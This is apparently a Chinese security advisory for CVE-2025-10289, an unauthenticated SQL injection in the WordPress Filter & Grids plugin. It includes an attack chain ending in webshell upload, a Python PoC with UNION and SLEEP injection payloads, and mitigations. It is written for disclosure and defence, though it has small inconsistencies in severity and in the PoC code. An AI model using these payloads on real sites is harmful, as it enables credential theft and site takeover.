CVE-2025-10289 WordPress Filter & Grids插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-10289

漏洞类型

SQL注入

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Filter & Grids plugin (ymc-smart-filter)

漏洞概述

CVE-2025-10289是WordPress Filter & Grids插件中的一个高危SQL注入漏洞。该插件是一款广泛应用于WordPress网站的过滤和网格展示插件，用户数量众多。漏洞存在于插件的搜索功能模块中，由于对用户输入的'phrase'参数缺乏充分的输入过滤和SQL查询预处理，攻击者可以通过构造恶意Payload注入到SQL查询语句中。此漏洞允许未认证攻击者通过网络远程利用，无需任何用户交互即可触发。由于SQL注入可以获取数据库中的敏感信息，攻击者可能窃取用户凭据、配置信息、业务数据等机密内容。值得注意的是，此漏洞仅在MariaDB数据库环境下可利用，因为在MySQL数据库中会触发语法错误。该漏洞于2025年12月13日披露，发现者为Wordfence安全团队。鉴于该插件的普及程度和漏洞的严重性，建议所有使用该插件的网站管理员立即采取修复措施。

技术细节

该SQL注入漏洞的根本原因在于插件对用户输入的'phrase'参数处理不当。在WordPress Filter & Grids插件的搜索功能实现中，程序直接将该参数值拼接到SQL查询语句中，而没有进行充分的输入验证和转义处理。具体来说，当用户在网站上执行过滤搜索操作时，插件会构建类似'SELECT * FROM wp_posts WHERE post_content LIKE "%phrase%"'的查询语句。攻击者可以通过在'phrase'参数中注入恶意SQL代码，如使用UNION SELECT语句来获取其他数据库表的数据，或使用BENCHMARK等函数进行时间盲注攻击。由于插件使用了不安全的SQL拼接方式，攻击者可以突破原始查询的逻辑边界，追加任意SQL语句。需要特别指出的是，该漏洞的利用存在数据库类型限制：在MariaDB数据库中，注入的SQL语句可以正常执行；而在MySQL数据库中，由于语法差异会导致查询失败，因此该漏洞仅影响使用MariaDB的WordPress站点。攻击者利用此漏洞可以提取数据库中的敏感信息，包括用户表中的账号密码、站点配置数据、API密钥等高价值信息。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别使用WordPress且安装Filter & Grids插件（版本<=3.2.0）的目标网站，通过robots.txt或wappalyzer等工具收集目标信息

STEP 2

步骤2

漏洞探测：攻击者访问网站的搜索功能端点（如admin-ajax.php），向'phrase'参数发送测试Payload，验证SQL注入漏洞是否存在

STEP 3

步骤3

Payload构造：攻击者根据MariaDB数据库特性，构造针对性的SQL注入Payload，可能使用UNION SELECT联合查询或布尔盲注技术

STEP 4

步骤4

数据提取：利用注入漏洞逐步提取数据库内容，包括WordPress用户表(wp_users)中的用户名和密码哈希、其他敏感配置数据

STEP 5

步骤5

权限提升：如果获取的管理员凭据可被破解，攻击者可登录WordPress后台，进一步上传webshell实现远程代码执行

STEP 6

步骤6

持久化控制：攻击者通过植入后门或修改插件代码建立持久化访问通道，可能导致网站被完全控制并用于恶意目的

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-10289 SQL Injection PoC
# Target: WordPress Filter & Grids Plugin (<=3.2.0)
# Vulnerability: Unauthenticated SQL Injection via 'phrase' parameter
# Note: This only works on MariaDB, not MySQL

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in WordPress Filter & Grids plugin
    The 'phrase' parameter is vulnerable to SQL injection
    """
    params = {
        'phrase': payload,
        'action': 'ymc_search_posts',
        'post_type': 'post'
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

def extract_database_version(target_url):
    """
    Extract MariaDB version using SQL injection
    """
    payload = "1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)-- "
    print(f"[*] Testing blind SQL injection...")
    
    # Example UNION-based extraction
    union_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- "
    print(f"[*] Testing UNION-based extraction...")
    result = exploit_sqli(target_url, union_payload)
    return result

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-10289.py <target_url>")
        print("Example: python cve-2025-10289.py http://example.com/wp-admin/admin-ajax.php")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Target: {target}")
    print(f"[*] Vulnerability: CVE-2025-10289 - WordPress Filter & Grids SQL Injection")
    
    # Test basic injection
    result = extract_database_version(target)
    print(f"[+] Response: {result[:500]}")

影响范围

ymc-smart-filter (WordPress Filter & Grids plugin) <= 3.2.0

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 在Web服务器层面配置SQL注入防护规则，拦截包含可疑SQL关键字的请求；2) 通过.htaccess或Nginx配置限制对admin-ajax.php等敏感端点的访问；3) 暂时禁用Filter & Grids插件的搜索功能；4) 使用云WAF服务（如Cloudflare、AWS WAF）添加额外的安全防护层。但最根本的解决方案仍然是升级到插件最新版本。